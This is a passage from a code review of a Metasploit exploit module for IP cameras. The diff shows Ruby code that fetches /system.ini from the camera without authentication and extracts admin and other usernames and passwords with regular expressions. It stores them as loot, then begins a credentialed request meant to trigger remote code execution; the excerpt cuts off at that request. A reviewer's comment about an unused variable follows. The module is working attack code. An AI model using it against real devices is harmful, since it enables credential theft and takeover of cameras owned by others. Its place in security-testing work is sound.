modules/exploits/linux/http/ipcam_rce_with_creds_leak.rb

```diff
@@ -0,0 +1,262 @@
+        res = send_request_cgi({
+          'uri' => '/system.ini',
+          'method' => 'GET',
+          'vars_get' => {
+            'loginuse' => '',
+            'loginpas' => ''
+          }
+        })
+
+        if res.nil? then print_error("No response from GET request while retrieving system.ini"); return end
+        if res.code != 200 then print_error("Wrong return code while retrieving sysem.ini: #{res.code}"); return end
+
+        data=res.body.force_encoding(Encoding::BINARY)
+        loot_name     = 'system.ini'
+        #loot_type     = 'text/plain'
+        loot_type     = 'application/octet-stream'
+        loot_filename = 'system.ini'
+        loot_desc     = 'ipcam raw information leak'
+        p = store_loot(loot_name, loot_type, datastore['RHOST'], data, loot_filename, loot_desc)
+        print_status("#{rhost}:#{rport} - Credentials saved in: #{p}")
+
+        vprint_status("Trying to extract credentials")
+
+        admin_regexp = /\x00{5}admin\x00{27}[\w@#!-]{1,25}\x00{5}/
+        blank_admin_regexp = /\x00{1}admin\x00{70}/
+        anylogin_regexp = /\x00{5}(?=.{32}[\w@#!-]{1,15}\x00{5})[\w@#!-]{1,15}\x00{1,32}[\w@#!-]{1,15}\x00{5}/
+
+        if data =~ admin_regexp
+          credsdata = data.scan(admin_regexp)[0].gsub(/\x00{5}admin[\x00]{1,27}/, "").gsub(/[\x00]{5}$/, "")
+          @creds[0] = {}
+          @creds[0]["username"] = "admin"
+          @creds[0]["password"] = credsdata
+
+        elsif data =~ blank_admin_regexp
+          @creds[0] = {}
+          @creds[0]["username"] = "admin"
+          @creds[0]["password"] = ""
+
+        elsif data =~ anylogin_regexp
+          credsdata = data.scan(anylogin_regexp)
+          credsdata.length.times do |i|
+            tmpcreds = credsdata[i].gsub(/^\x00{5}/, "").gsub(/\x00{5}/, "").gsub(/\x00+/, " ").scan(/[\w@#!-]{2,}/)
+            @creds[i] = {}
+            @creds[i]["username"] = tmpcreds[0]
+            @creds[i]["password"] = tmpcreds[1]
+          end
+      end
+
+        if @creds.length > 0
+          print_good("Found #{@creds.length} possible credentials")
+          @creds.each do |c|
+            print_good("login : #{c["username"]} / password : #{c["password"]}")
+              report_cred(
+                ip: rhost,
+                port: rport,
+                user: c["username"],
+                password: c["password"],
+                service_name: (ssl ? "https" : "http")
+              )
+          end
+        else
+          print_error("Could not automatically extract any credentials from loot file, review it manually")
+          return
+        end
+        if datastore["GATHER_CREDS_ONLY"]
+          vprint_status("Stopping due to GATHER_CREDS_ONLY option")
+          return
+        end
+      end
+
+      vprint_status("Trying to trigger code execution with credentials : login : #{@creds[0]["username"]} / password : #{@creds[0]["password"]}")
+      res = send_request_cgi({
```

Comment:
no need for res here since you never check it and overwrite it in the next instruction